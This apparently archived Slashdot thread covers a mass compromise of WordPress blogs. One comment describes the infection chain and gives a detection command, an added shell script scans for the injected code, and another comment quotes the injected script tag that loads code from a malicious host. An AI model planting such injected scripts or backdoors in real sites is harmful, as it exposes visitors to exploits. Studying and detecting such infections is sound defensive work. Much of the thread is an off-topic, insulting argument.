
30K WordPress Blogs Infected With the Latest Malware Scam

Unknown Lamer posted more than 2 years ago | from the check-your-versions dept.

Security 104

alphadogg writes with an excerpt from an article over at Network World: "Almost 30,000 WordPress blogs have been infected in a new wave of attacks orchestrated by a cybercriminal gang whose primary goal is to distribute rogue antivirus software, researchers from security firm Websense say. The attacks have resulted in over 200,000 infected pages that redirect users to websites displaying fake antivirus scans. The latest compromises are part of a rogue antivirus distribution campaign that has been going on for months, the Websense researchers said."

104 comments

McAfee? (5, Funny)

Oswald McWeany (2428506) | more than 2 years ago | (#39275373)

websites displaying fake antivirus scans

I didn't know McAfee had started targeting Web blogs now.

Re:McAfee? (3, Informative)

tepples (727027) | more than 2 years ago | (#39275389)

It might be hard to believe, but there are antivirus companies even less scrupulous than McAfee and Norton. Wikipedia explains [wikipedia.org].

Re:McAfee? (1)

Ihmhi (1206036) | more than 2 years ago | (#39277279)

Selectively disabling parts of the system to prevent the user from uninstalling the malware. Some may also prevent anti-malware programs from running, disable automatic system software updates and block access to websites of anti-malware vendors.

I dunno, sounds like Norton to me.

Norton tries to provide a working uninstaller (1)

tepples (727027) | more than 2 years ago | (#39278087)

At least Norton tries to provide a working removal tool [symantec.com] at no charge. The only problem I've found is that it's made deliberately inaccessible to blind users (with a CAPTCHA) so that malware doesn't automatically run it on every computer that it tries to infect.

Re:McAfee? (1)

hairyfeet (841228) | more than 2 years ago | (#39278603)

Oh Lord, please don't say that name! Poor Jim is still rocking himself in the corner going "It just won't uninstall! Why won't it uninstall? It just won't go away" after the last wave of Norton infected laptops came through and we have finally got his mumbling quieted down, please don't give Jim a flashback!

As for TFA this is why I recommend the combo of Win 7 with either Avast or Comodo IS along with Comodo Dragon with ABP. Windows 7 has DEP and ASLR along with UAC and Comodo Dragon is able to take advantage of the low rights mode for browsers built in, ABP blocks the ads that are the source of many an infection, Avast and Comodo IS have built in sandboxing which adds another layer of protection but while Avast has a simpler UI for home users Comodo IS is free for business AND home so it's really a preference thing.

With this combo I took an offlease I was planning to wipe anyway and tried my damnedest to infect the thing. I went to every crapsite and topsite and "punch the monkey to win an iPod" and scammer haven I could find and afterwards ran a half a dozen offline scans, nothing. Zip zero zilch nada. Most of the nasty sites were blocked by the Comodo SecureDNS option in Dragon and when I turned that off both Avast and Comodo IS blocked the sites from loading the malware so I'd say that is a resounding success. I know I have customers (as well as family, ugh) that can pick up bugs like a Bangkok Whore on a Saturday night yet since switching them over to this combo they have been completely bug free, and with them that's saying a lot.

Re:McAfee? (0)

helix2301 (1105613) | more than 2 years ago | (#39275579)

When I had my self hosted wordpress blog there were always updates to wordpress, addon and widgets. Not to mention spammers and scammers all day every day, Wordpress is a great platform but very insecure.

No infection over here! (0)

Anonymous Coward | more than 2 years ago | (#39275411)

gaia ~ # find /srv/www/ -type d -name "ToolsPack"
gaia ~ #

Analysis (4, Insightful)

SirDice (1548907) | more than 2 years ago | (#39275443)

Why do they always focus on the crap that's left behind when they analyze these things? I want to know how they managed to get that stuff on those servers so I can check my own. Was it an old and vulnerable WordPress or was it some 0-day they used? For some reason they always focus on the effects and not on the causes.

Re:Analysis (5, Informative)

WankersRevenge (452399) | more than 2 years ago | (#39275625)

From the fine article:

Many of the blogs compromised in these recent attacks were running outdated WordPress versions, had vulnerable plug-ins installed or had weak administrative passwords susceptible to brute force attacks, said David Dede, a security researcher with website integrity monitoring firm Sucuri Security. "It seems the attackers are trying everything lately."

Re:Analysis (1)

SirDice (1548907) | more than 2 years ago | (#39275859)

Ah, that helps. I only read the WebSense analysis hoping to read some details there. Apart from mentioning WordPress there isn't much in there how they actually got in.

Re:Analysis (0)

Anonymous Coward | more than 2 years ago | (#39289585)

Our pretty large wordpress-based portal was hit by this malware campaign.
In our case, the attacker gained entry through the infamous TimThumb exploit from last year.
First, the following PHP code was planted as a "command-and-control" script: http://pastie.org/private/021xesy1x83sgp0fodyq

This script was then used to infect several Wordpress include files with the following types of packed scripts: http://pastie.org/private/g9yuhafnt78jxcuf8sag
Every infection was unique, save for the array in the beginning. Some variations used base64_decode and gzinflate. The variable names were randomized, and the encoded content was unique in each case, as the script inside also had randomized variables.
The infection was on one single line, at the beginning of the infected files.

Unpacked, the script looks like this: http://pastie.org/private/otn4kadsvn0phno3igiccg
In the cases we observed, it planted rogue javascript in the HEAD section of the page that was being loaded, such as this: http://pastie.org/private/oi9vpntqiwhthj11obpyug
There were many variations of the javascript as well, but the ones I checked out just created a cookie called "lonly", and planted a rogue iframe in the body section.
The iframe then of course loaded the actual client-side exploits, among which I noticed a Java runtime vulnerability, at least.

Long story short, you can run the following on your WP directory to see if you're infected: egrep -r '^<\?php.* = array\(' *

Additionally, here are some addresses used in the attack: http://pastie.org/private/u5wikv6spq8nhcaduppca
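
The first-line check from the comment above, turned into a small triage scanner; this is an added example, not code from the commenter or from WordPress. The HIGH/REVIEW labels, the 500-character threshold and the sample files are assumptions constructed for illustration, and the ToolsPack directory name is the one another comment in this thread searches for.

```shell
#!/bin/sh
# Added example (not from the thread): line-1 triage for the injection described above.
# The HIGH/REVIEW labels and LONG_LINE are assumptions of this example.

# Signature from the comment's egrep, applied to the first line of each file only.
SIG='^<\?php.* = array\('
# Functions the comment says some variants used for packing.
PACKERS='base64_decode|gzinflate'
# Assumed length above which a matching first line is treated as packed.
LONG_LINE=500

# classify_php_file FILE -> prints HIGH, REVIEW or CLEAN (inspects line 1 only).
classify_php_file() (
    first=$(LC_ALL=C head -n 1 -- "$1" 2>/dev/null) || first=''
    if ! printf '%s\n' "$first" | LC_ALL=C grep -Eq -- "$SIG"; then
        echo CLEAN
    elif printf '%s\n' "$first" | LC_ALL=C grep -Eq -- "$PACKERS" ||
         [ "${#first}" -gt "$LONG_LINE" ]; then
        echo HIGH
    else
        echo REVIEW
    fi
)

# scan_wp_tree DIR -> one "VERDICT<TAB>path" line per suspicious item.
# Paths containing newlines are not handled (plain find | read loop).
scan_wp_tree() (
    find "$1" -type f -name '*.php' | sort | while IFS= read -r f; do
        verdict=$(classify_php_file "$f")
        [ "$verdict" = CLEAN ] || printf '%s\t%s\n' "$verdict" "$f"
    done
    # Directory name that another comment in this thread searches for.
    find "$1" -type d -name 'ToolsPack' | sort | while IFS= read -r d; do
        printf 'DIR\t%s\n' "$d"
    done
)

# make_constructed_samples DIR -> writes inert, constructed test files under DIR.
make_constructed_samples() {
    mkdir -p "$1/wp-includes" "$1/wp-content/plugins/ToolsPack"
    # Clean file: "<?php" alone on line 1, array assignment on a later line.
    printf '<?php\n$defaults = array(1, 2);\n' > "$1/wp-includes/clean.php"
    # Single packed line prepended ahead of the original code (placeholder payload).
    printf '<?php $qx = array("a","b"); $z = gzinflate(base64_decode("CONSTRUCTED"));?><?php\necho 1;\n' \
        > "$1/wp-includes/packed.php"
    # Line 1 matches the signature but shows no packing: needs a human look.
    printf '<?php $opts = array("x" => 1);\necho 2;\n' > "$1/wp-includes/plain.php"
    # Template where the pattern starts line 3; a recursive egrep would flag it.
    printf '<html>\n<body>\n<?php $args = array(1); ?>\n' > "$1/wp-content/template.php"
}

# With an argument, scan that directory; without one, run on the constructed samples.
if [ "$#" -gt 0 ]; then
    scan_wp_tree "$1"
else
    demo=$(mktemp -d) && make_constructed_samples "$demo" && scan_wp_tree "$demo"
    rm -rf "$demo"
fi
```

Unlike the recursive egrep, this ignores a template whose `<?php $args = array(...)` sits on a later line, so legitimate code that happens to match the pattern further down a file is not reported.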

wordpress, again? (1)

v1 (525388) | more than 2 years ago | (#39275455)

Is it just a popularity/contrast thing, or does wordpress seem to be popping up a lot recently for security holes in their web servers?

Re:wordpress, again? (2)

Spad (470073) | more than 2 years ago | (#39275511)

At a guess, the ratio of Installs to Unpatched/Insecure Installs, both of the core WP software and its many, many 3rd party plugins and themes.

A *lot* of sites are either running old versions of software or have plugins/themes with gaping vulnerabilities that are no longer under active development.

Re:wordpress, again? (4, Interesting)

gmack (197796) | more than 2 years ago | (#39275647)

Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

Re:wordpress, again? (1)

Anonymous Coward | more than 2 years ago | (#39275807)

Set up WP MultiSite, update one site and one set of plugins and be done with it - easy as that...

Re:wordpress, again? (0)

Anonymous Coward | more than 2 years ago | (#39275849)

Stop using Windows if you want software updates that are managed.

Re:wordpress, again? (1)

X0563511 (793323) | more than 2 years ago | (#39276187)

That has anything to do with Wordpress?

Doesn't even make sense. Windows has automatic updating, something Linux distros are just starting to do (notifying has been around for a while, but automatically acting is "new")

Re:wordpress, again? (1)

turbidostato (878842) | more than 2 years ago | (#39276401)

"notifying has been around for a while, but automatically acting is "new""

Do you really consider something that has been available, well, forever as new? (I'll just mention cron-apt as an example).

Re:wordpress, again? (1)

X0563511 (793323) | more than 2 years ago | (#39276857)

It is neither installed or mentioned during a standard system installation. That's the difference.

Re:wordpress, again? (1)

turbidostato (878842) | more than 2 years ago | (#39277423)

"It is neither installed or mentioned during a standard system installation. That's the difference."

Neither is Apache therefore web servers are the new thing, is that your point?

Of course not. I know what your point is: that no *true* Scotsman...

Re:wordpress, again? (1)

X0563511 (793323) | more than 2 years ago | (#39277909)

What?

What does apache have to do with it? The idiot was talking about OS auto updating, which I pointed out had nothing to do with anything.

I then went on to say that even if it DID have anything to do with it, he was wrong anyway.

Re:wordpress, again? (0)

Anonymous Coward | more than 2 years ago | (#39276527)

Windows update doesn't provide updates for Wordpress.
The typical Linux package management does provide updates for Wordpress.
In Linux, you can customize, to your liking, the amount of automation present in your package update process.

The reason it doesn't make sense is because you are ignorant of the facts.

Re:wordpress, again? (1)

X0563511 (793323) | more than 2 years ago | (#39276905)

Er, no. Try again. Preferably with more reading comprehension.

Re:wordpress, again? (0)

Anonymous Coward | more than 2 years ago | (#39277567)

Windows has automatic updates for Wordpress now?
The typical Linux package manager doesn't provide updates for Wordpress?
You can't have these things automated on Linux?

What exactly are you trying to say? Because all I'm reading is "Blah blah bah I don't know what the fuck I'm talking about."

Re:wordpress, again? (0)

Anonymous Coward | more than 2 years ago | (#39275861)

You should be fired for being a shitty sysadmin. It's a sysadmins job to research such problems and propose solutions, not just belly ache on forums. In this case, WPMU.

Re:wordpress, again? (1)

ArsenneLupin (766289) | more than 2 years ago | (#39276283)

Or failing to find a specific solution for Wordpress: Use perl's WWW::Mechanize to click that DB upgrade link (and any other GUI-only things) for you.

Re:wordpress, again? (4, Informative)

nick.sideras (836787) | more than 2 years ago | (#39275879)

Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

This drove me nuts at my current job for about 2 months - you need Wordpress Network [wordpress.org].

There's the easy way and the hard(er) way to do this:

This [wordpress.org] is the official easy way, but it's never worked for me (last tried in Spring of 2011). The nice thing is that it's all stuff built into WordPress, so you should be able to do it without any problems. I'd say it's probably worth giving this a try with one site, and if it works, run with it.

This [bavatuesdays.com] is a more down and dirty way that will definitely work, and is more or less how I did it. A little SQL editing never hurt anyone.
Also, this [sillybean.net] is a great companion to the bavatuesdays link. He goes on about his DNS in the first few paragraphs, but the second half of that post has some good details about where files need to be, and how links and such need to be updated.

Once you have a network, you have a fantastic "Update Network [wordpress.org]" button. Boom. Take the rest of the day off.

Re:wordpress, again? (1)

aussiedood (577993) | more than 2 years ago | (#39275897)

Agreed! At least you only have 15, I've just been given the task of managing our Wordpress implementation, we're at 144. *Ugh*

Re:wordpress, again? (1)

Anonymus (2267354) | more than 2 years ago | (#39276577)

WordPress is extremely easy and quick to update. You can click a single button and update every single plugin and theme, or another button to update core. That's it. If you're upgrading by manually uploading files to a bunch of different servers for some reason, you should at least look into something like updating with Subversion [wordpress.org] or using multisite and just updating once for every site.

Re:wordpress, again? (1)

Hatta (162192) | more than 2 years ago | (#39276587)

You can't automatically log into a website and click a link with a very small shell script?

Re:wordpress, again? (1)

element-o.p. (939033) | more than 2 years ago | (#39277399)

Seriously? It's a hassle to have to log into each server and click a link?

You must never have run Gentoo*...

*Which is still my favorite distro, despite occasionally being a real PITA to update.

Re:wordpress, again? (1)

gmack (197796) | more than 2 years ago | (#39278103)

I used to love hand compiling everything but then I got my first full time sysadmin job. The job came with 20 servers and thankfully 15 of them ran Debian. When you have to do something repeatedly it gets old quickly so now I want the OS to do as much as possible and script most of the rest.

Re:wordpress, again? (1)

element-o.p. (939033) | more than 2 years ago | (#39278415)

LOL. I've been a full time sys admin for ten years -- first with Solaris and FreeBSD servers, then in my current job with about 15 or so Gentoo (!) servers plus my laptop and a desktop. We migrated to Ubuntu about three years ago. In all honesty, we do a much better job of updating the Ubuntu servers than we did the Gentoo servers because it is so much easier to do, but I am starting to loathe my Ubuntu laptop. It's a lot easier to get wireless working in Ubuntu than Gentoo, but Unity, nVidia drivers*, and a few other problems are really starting to sour me on Ubuntu. I'm hoping 12.04 will bring back the stability I experienced up to 10.10; IMHO, the 11.xx series is Canonical's Vista.

*Yes, I know, those are proprietary drivers. I can't blame Canonical entirely for that, but IIRC, there are much newer drivers available that aren't available in the official "restricted" repositories.

Re:wordpress, again? (1)

gmack (197796) | more than 2 years ago | (#39278565)

I gave up on the new Ubuntu pretty quickly while installing a friend's notebook last month and ended up installing debian + xfce + wicd. No complaints from him at all.

For servers, it's hard to beat debian + dotdeb repo.

Re:wordpress, again? (0)

Anonymous Coward | more than 2 years ago | (#39279585)

https://wpremote.com/ allows you to update multiple wordpress sites from a single interface. I spoke with one of the developers via twitter and email and it seems secure.

Re:wordpress, again? (1)

mattrad (78969) | more than 2 years ago | (#39281511)

Well my clicking-averse friend, you need managewp.com. One login and a click or two, and you've updated all those 15 installs. Either that or migrate everything to multisite (Backup Buddy is great for that).

Re:wordpress, again? (1)

Pf0tzenpfritz (1402005) | more than 2 years ago | (#39283483)

You mean "the fact that I have missed to write some working update/deployment script is annoying"? Come on - it's not that hard. Just rsync anything but wp-content. Make sure they all have the same plugins installed but not necessarily activated and sync the plugins folder, too. That's for starters. The elegant way involves delivering images and "uploads" from a CDN and simply unpacking the new versions over the old ones by rsync, ftp or wget...

Re:wordpress, again? (1)

Anonymus (2267354) | more than 2 years ago | (#39276633)

I personally think it's mostly a popularity thing, since WordPress pretty much owns the blog market. I think the other problem, however, is just with how simple they've made it to accidentally backdoor your site. There are thousands of plugins for WordPress, installable with just a couple of clicks, written by people who know nothing about security, or have possibly even maliciously left holes in their plugin. Unlike large projects that are generally maintained and reviewed by dozens of people, a plugin is usually written by one person who could just decide to backdoor your site in the next update.

I've got a couple of moderately popular plugins, and every time I release an update I think about just how easy it would be to take over thousands of sites by just adding a few innocuous-looking lines of code. Except I'm not evil, so I don't.

Re:wordpress, again? (0)

Anonymous Coward | more than 2 years ago | (#39277169)

So basically what it comes down to that we have to be careful what software we run? The horror!!

Method of infection (3, Insightful)

dgharmon (2564621) | more than 2 years ago | (#39275529)

"The Websense ThreatSeeker Network has detected a new wave of mass-injections [websense.com] of a well-known rogue antivirus campaign"

How exactly are these sites infected in the first place?

"The page looks like a Windows Explorer [websense.com] window with a "Windows Security Alert" dialogue box in it"

Ahh so - nothing to read here ... moving on ...

Re:Method of infection (2)

Pope (17780) | more than 2 years ago | (#39276163)

I used to get those all the time on my Mac and just laugh. Then they made a special OS X-looking one.

Re:Method of infection (1)

Rick17JJ (744063) | more than 2 years ago | (#39276839)

A number of years ago, I encountered a fake Microsoft security warning while using my Linux computer. It said that Microsoft had detected viruses and spyware on my computer. This was on a Linux computer that did not have any Microsoft products installed on it.

It offered to do a free online scan of my hard drive. Despite clicking on No, a progress bar appeared as it started to do a fake scan of my hard drive. After about 60 seconds, it said that it had finished scanning my drive C. It then said that several different viruses and types of spyware had been detected in both my registry and on drive C. The funny thing is that Linux does not have a registry and also does not use drive letters to designate hard drive partitions.

It listed the names of several viruses that my Linux computer was supposedly infected with. Despite knowing that the test was bogus, I looked up those virus names out of curiosity, and found they were all Windows only viruses. Their scareware ad then offered to sell me their antivirus product, to remove the viruses and spyware.

My understanding is that most desktop users of Linux, have never felt the need to use antivirus software, because Linux viruses have never been a problem.

Despite their supposedly thorough scan of my registry and drive C, they had not noticed that I was not using Windows. Has anyone bothered yet to make a Linux version of their scareware ads?

Re:Method of infection (1)

klui (457783) | more than 2 years ago | (#39281327)

So looks like the injected code
</DIV> <!-- END body-wrapper -->
<script src="http://ionis90landsi.rr.ru/mm.php?=1"></script>
</BODY>
</HTML>

would be taken care of with NoScript as long as your white list is short and doesn't contain rr.nu in this example.

Specialist ISP of Transnistria.. again. (5, Interesting)

Dynamoo (527749) | more than 2 years ago | (#39275539)

It looks like the first step in the infection is via an IP (194.28.114.103) belonging to Specialist ISP of Transnistria [wikipedia.org]. That has featured before on Slashdot in this story [slashdot.org].

The block 194.28.112.0/22 is simply all evil (I've documented it here [dynamoo.com] in the past), there's no reason to send traffic to it at all, blocking it is a good option.

Re:Specialist ISP of Transnistria.. again. (1)

gaspyy (514539) | more than 2 years ago | (#39276151)

Transnistria is basically a haven for organized crime. A "republic" with virtually no international recognition, a very small economy and ties with international arms dealers.

Re:Specialist ISP of Transnistria.. again. (2)

Dynamoo (527749) | more than 2 years ago | (#39280425)

Exactly. It's a country that doesn't exist in the eyes of most other countries, which makes it beyond the reach of international law enforcement. There are other countries in the world like that, the difference with Transnistria is that it has a somewhat modern infrastructure.

Thanks! apk (0)

Anonymous Coward | more than 2 years ago | (#39276211)

Looks like the exact kind of research vs. malware that I love to find online - the kind that lists the bogus IP ranges &/or bad hosts/domains involved also...

* This, in turn, leads to more valid entries for protection vs. such machinations online via addition to my custom HOSTS file with 0.0.0.0 blocking applied to each of them!

APK

P.S.=> See subject-line, & once more thanks - I truly do appreciate it! apk

/facepalm (0)

Anonymous Coward | more than 2 years ago | (#39276505)

Yes, you WOULD come along and decide to use the hosts file to block entire IP ranges. Which, of course, would require hundreds or thousands of entries, rather than a single firewall rule.

By the way, the hosts file won't even work to block IP addresses (on current versions of Windows at least). It only works for host names. I.e. "0.0.0.0 google.com" blocks http://google.com/ [google.com] (but http://74.125.225.136/ [74.125.225.136] still loads the Google website), while "0.0.0.0 74.125.225.136" simply doesn't do anything (both http://google.com/ [google.com] and http://74.125.225.136/ [74.125.225.136] load perfectly fine).

When all you have is a hammer...

LOL! I KNOW THAT - proof inside... apk (0)

Anonymous Coward | more than 2 years ago | (#39277275)

"By the way, the hosts file won't even work to block IP addresses (on current versions of Windows at least)." - by Anonymous Coward on Wednesday March 07, @12:29PM (#39276505)

Proof vs. your misunderstanding my post is RIGHT here:

"Alexander Peter Kowalski says:
  May 1, 2011 at 1:51 AM

@JG: That's when using firewall rules tables (either software ones OR router based firewalls) to block out IP addresses." - FROM -> http://technologytosoftware.com/block-website-access-on-windows.html [technologytosoftware.com]

Eat it, boy...

* So, "as-per-my-usual"? I absolutely DUST /. 'naysayers', easily... &, with backing proof!

APK

P.S.=> Epic fail on your part troll... &, it certainly looks like you have to "eat your words", AND, take your 'facepalm' b.s. right back @ yourself, lol!

... apk

Re:LOL! I KNOW THAT - proof inside... apk (0)

Anonymous Coward | more than 2 years ago | (#39279381)

No, you specifically said that you were going to block the IP ranges with HOSTS, right here:

the kind that lists the bogus IP ranges &/or bad hosts/domains involved ... leads to more valid entries for protection vs. such machinations online via addition to my custom HOSTS file with 0.0.0.0 blocking applied to each of them

You can't. It doesn't work. Nice try, apk-boy, but you fail, and you can't spin this one off as mere trolling from an AC. You claimed that you could HOSTS-block IP addresses. You can't. You misspoke. You were wrong, and I called you on it. At this point the best thing you can do is admit it and move on.

What a truckload of b.s., lmao... apk (0)

Anonymous Coward | more than 2 years ago | (#39280477)

I posted far earlier SPECIFIC statements of myself noting you cannot block IP addresses using HOSTS files here:

"Alexander Peter Kowalski says:
      May 1, 2011 at 1:51 AM

@JG: That's when using firewall rules tables (either software ones OR router based firewalls) to block out IP addresses." - FROM -> http://technologytosoftware.com/block-website-access-on-windows.html [technologytosoftware.com]

Eat it, boy... There's FAR EARLIER PROOF that in regards to HOW to use hosts files, I understand them, completely.

You? LOL, you don't have the intelligence to EVER get the best of me, hence why you post as "AC", because you're weak/lame, and you KNOW it.

* Face it, troll - you lose/fail. Also note, I stated the word "valid" in my original reply?

Clue: The ONLY VALID things you can block in a hosts file, are host-domain names, & my FAR EARLIER QUOTE from above notes this... you can't win.

APK

P.S.=> Your other "blunder" here:

http://news.slashdot.org/comments.pl?sid=2712357&cid=39277339 [slashdot.org]

Utterly hilarious - trying to say diff. versions of Windows could block IP addresses using HOSTS files! LOL... apk

Re:What a truckload of b.s., lmao... apk (0)

Anonymous Coward | more than 2 years ago | (#39299729)

(1) You screwed up in your original post by claiming that "valid entries" in a HOSTS file could block IP addresses. I don't care if you forgot or simply misspoke. It is false. There is no "valid" way to block an IP address with HOSTS. You claimed there was. I called you on it. Admit it, Alex, and quit being an arrogant douche.

(2) You are falsely and dishonestly misrepresenting what I said. I said that Windows XP CANNOT block IP addresses using HOSTS file, which is absolutely true. I deliberately said nothing about other versions of Windows. My reason for saying was, in fact, that I am sitting in front of a Windows XP machine and tested it and it didn't work. I have not tested other versions of Windows, so I cannot comment on whether or not they can block IP addresses with HOSTS. Your "correction" was not a correction, it was additional information based on rigorous testing which (I assume) you have performed - right? You did test it on all versions of Windows? I only tested it on Windows XP.

LOL, the "big fail" by the ac stalker coward troll (0)

Anonymous Coward | more than 2 years ago | (#39300213)

Show us I was blocking ip addresses with hosts explicitly. I never said that and I produced evidence I know better (where I even corrected a fellow named JG about it) and I showed literal proof of it.

You incorrectly inferred it. Learn to read.

LOL, You on the other hand made a gigantic blunder stating different versions of Windows could do that here:

"By the way, the hosts file won't even work to block IP addresses (on current versions of Windows at least)." - by Anonymous Coward on Wednesday March 07, @12:29PM (#39276505)

FROM -> http://news.slashdot.org/comments.pl?sid=2712357&cid=39277339 [slashdot.org]

You lose troll: There never WAS a version of Windows, or any other OS, that could block IP addresses with a hosts file.

Hell - You won't even face me under your registered account and that tells the tale perfectly showing you are indeed, weak and a trolling little coward, so calling me "arrogant douche"? Makes me laugh.

See subject-line above, lol... it's YOU!

Re:What a truckload of b.s., lmao... apk (0)

Anonymous Coward | more than 2 years ago | (#39300309)

I deliberately said nothing about other versions of Windows.

Oh really? It appears you did and did an EPIC FAIL here on those very grounds:

By the way, the hosts file won't even work to block IP addresses (on current versions of Windows at least).

apk also showed he doesn't block ip addressed domains in hosts files with proof from much earlier than this post exchange and that to do so would be invalid since he said valid entries here which he has been shown in knowing in his posts to JG at the site with the proof he understands how hosts files work, whereas above you do not.

Which further proves you cannot read and that you cannot win troll. You've also been shown as stalking apk all over this site. That's twisted. Grow up.

Re:What a truckload of b.s., lmao... apk (0)

Anonymous Coward | more than 2 years ago | (#39301003)

Good catch. Hehehe apk always nukes the cowardly ac stalker troll. Apk method = turn the tables on the cowardly ac troll stalker with his own mistakes and apk usually posts proofs to the contrary vs. the ac stalker trolls' crap. It is hilarious and happens every time, which is definitely why the cowardly ac stalker troll doesn't post with his registered account. His track record posted here this week alone is so poor he is afraid to confront apk directly. Sucks to be him. His whole life must be that way, I know the type. Cowards are all the same.

Re:What a truckload of b.s., lmao... apk (0)

Anonymous Coward | more than 2 years ago | (#39300473)

Since when is Windows XP a current version of Windows? Windows 7\Srv 2008 are current versions. I would like to know how you live with yourself knowing you're nothing but a cowardly stalker, or is stalking apk around this forums and constantly blundering your part as an ac stalker not illustrating this to us reading? There is 3-4 evidences of it posted here, no denying it. You're don't show us differently when you're shown in numerous attempts at trying to harass apk this week alone and failing technically too but worst of all by using ac posts instead of your registered account. You're only showing us you fear him because if you didn't you'd post under your registered account.

Re:What a truckload of b.s., lmao... apk (0)

Anonymous Coward | more than 2 years ago | (#39325813)

Since when is Windows XP a current version of Windows?

Windows XP is still a current version and it will remain a current and supported version by Microsoft, all the way until April 8 2014 (with critical bug fixes / security patches still being released until then). STRIIIIKE ONE. http://windows.microsoft.com/en-us/windows/products/lifecycle [microsoft.com]

Furthermore, many workplaces (e.g. mine) still purchase all of their computers with XP licenses. XP is very much alive and kicking, despite your (incorrect) claim that it is not a current version.

Windows 7\Srv 2008 are current versions.

Well, you have egg on your face yet again. NEITHER Windows 7, nor Windows Server 2008, are the most recent versions of those Microsoft product lines: that's Strike two, and Strike three... the way I calculate that, YER OUT.

Windows 7 was updated to Windows 7 SP1, so if you're still running Windows 7? Time to update, because your version is OLD and OBSOLETE! You have a whole slew of vulnerabilities and bugs that were patched in Windows 7 SP1.

And Windows Server 2008? It has been replaced by no less than THREE separate service packs/revisions:
Windows Server 2008 SP2
Windows Server 2008 R2
Windows Server 2008 R2 SP1 (the most recent version)

Windows Server 8 is in beta, but I won't count that one against you since it hasn't been officially released yet.
http://www.microsoft.com/en-us/server-cloud/windows-server/default.aspx [microsoft.com]

worst of all by using ac posts instead of your registered account
by Anonymous Coward on 09.03.2012 8:36 (#39300473)

Pot, meet kettle. No further comment necessary.

Posting 3 days later to get the "last word", lol? (0)

Anonymous Coward | more than 2 years ago | (#39345207)

The current models of Windows in mainstream release, are indeed, Windows 7 + Windows Server 2008 (R2 iirc on the latter but that's just a nitpick & certainly NOT XP as you stated, & now you're trying to "mince words", lol). You fail as usual:

Windows XP is NOT as current as Windows 7, or Windows Server 2008, period.

* Sorry, but I am here to "blow you away" yet again, as usual in this exchange: Per my subject-line above, did you *THINK* I was going to let a devious little wannabe 'smart' weasel like YOU, do that to ME? LOL, guess again...

APK

P.S.=> Above ALL else here, however? Your AC stalking of myself is pitiful, and shows us you do NOT have much confidence in yourself - &, the rest of my replies here do the rest, easily (plus, your taking 3 days to come up with what everyone KNOWS is a line of bullshit on your part? Not too convincing, since the CURRENT MODELS OF WINDOWS ARE NOT Windows XP, pal)... apk

Re:Posting 3 days later to get the "last word", lo (0)

Anonymous Coward | more than 2 years ago | (#39354969)

Windows Server 2008 (R2 iirc on the latter...

How many times do I have to repeat myself, you stupid troll?

Windows Server 2008 is NOT THE SAME VERSION of the Windows Server operating system as Windows Server 2008 R2. And that is not a minor nit pick. It is a COMPLETELY different release of the Windows Server operating system. If it was an update, they would have released another SERVICE PACK, like they had already released SP2 for Windows Server 2008, so if you wanted to nit pick you could say that Windows Server 2008 SP2 is a different edition of the Windows Server 2008 OS. But Windows Server 2008 R2 is a different version, as you can see here in this list, straight from Microsoft: http://support.microsoft.com/ph/1163#tab13 [microsoft.com]

Windows Server 2008 R2 (All Editions)
Windows Server 2008 (All Editions)
Windows Server 2003 R2 (All Editions)
Windows Server 2003 (All Editions except Computer Cluster Edition)
Windows Server 2003 Compute Cluster Edition

THEY ARE DIFFERENT OPERATING SYSTEMS. The list does not show any of the service packs (different editions of the same OS), because they are NOT different operating systems, but it DOES list R2 separately, because IT IS A DIFFERENT OS. Windows Server 2008 is NOT the "most recent version", Windows Server 2008 R2 is.

The only reason it has the same year? Microsoft released two different versions in one year. The first one was Windows Server 2008. The next one was the 2nd released version (R2) in that year (2008): Windows Server 2008 R2.

Windows XP is NOT as current as Windows 7, or Windows Server 2008, period.

AS CURRENT? So now you admit that IT IS CURRENT (as I said it is), it is just not AS CURRENT as Windows 7. Changing the goalposts? Yes I think so. QED, bitches. Windows XP is a current Microsoft operating system and will be until its end of extended support on April 8 2014.

And Windows Server 2008 is not AS CURRENT as Windows Server 2008 R2. You fail yet again.

Re:Posting 3 days later to get the "last word", lo (0)

Anonymous Coward | more than 2 years ago | (#39359647)

You said Windows XP is a current build. It's not and that's that! U FAIL.

Re:Posting 3 days later to get the "last word", lo (0)

Anonymous Coward | more than 2 years ago | (#39365233)

You said Windows XP is a current build.

No I didn't, you fucking liar.

I never said that you could block IP addresses using hosts. YOU DID.

I never said that Windows XP is a current build. THAT IS A BLATANT LIE.

I said that Windows XP is a current version. AND IT IS.

Windows XP is in extended support by Microsoft until 2014 and there are hundreds of thousands of computers which are running fully up-to-date, patched, and CURRENT copies of the XP version of Windows.

You're a liar and a dishonest scumbag.

Take ur meds n calm down psycho: U FAILED (0)

Anonymous Coward | more than 2 years ago | (#39366423)

Proof otherwise on ip addresses in hosts files from apk was posted here http://news.slashdot.org/comments.pl?sid=2712357&cid=39277275 [slashdot.org] from long ago.

Current version(s) of Windows are not XP: Everyone knows that. It is merely being supported still. Windows 7 & Windows Server 2008 are current models (and their updates like SRVR2).

You fail, you know it, grow up and accept it.

Re:Take ur meds n calm down psycho: U FAILED (0)

Anonymous Coward | more than 2 years ago | (#39380671)

Current version(s) of Windows are not XP

XP is currently installed on tens if not hundreds of thousands of computers and is fully up-to-date and patched with all of the latest security updates from Microsoft. Another word that means "up-to-date" is "current". XP is a current version of Windows.

Windows 7 & Windows Server 2008 are current models (and their updates like SRVR2).

R2 IS NOT AN UPDATE OF SERVER 2008. It is a NEW VERSION OF THE WINDOWS SERVER OPERATING SYSTEM. Is that fucking clear?

MS doesn't even SELL XP ANYMORE, dolt! apk (0)

Anonymous Coward | more than 2 years ago | (#39382571)

Windows XP has not been sold since June 30, 2008. On October 22, 2010, you will not be able to purchase new computers that already have Windows XP installed on them.

http://www.ehow.com/facts_6876358_buy-copy-windows-xp.html [ehow.com]

It is not a current build of Windows idiot. Everyone knows that except you, but then, you DO know that too, don't you? You're just being a trolling waste of life, otherwise you wouldn't do your ac stalking posts would you. Of course not. It is fun making you look stupid though.

APK

P.S.=> I must ask - how BADLY have I 'kicked your ass' here and on what particular technical topic that you insist on attempting to stalk & harass me by your ac stalkings of myself, hmmm? LOL! Your "geek angst" is showing, and I don't think you possess the intelligence to realize 1 simple fact: You will never have the intelligence to get the better of myself, ever... apk

Does Microsoft still sell XP? U FAIL STALKER (0)

Anonymous Coward | more than 2 years ago | (#39371397)

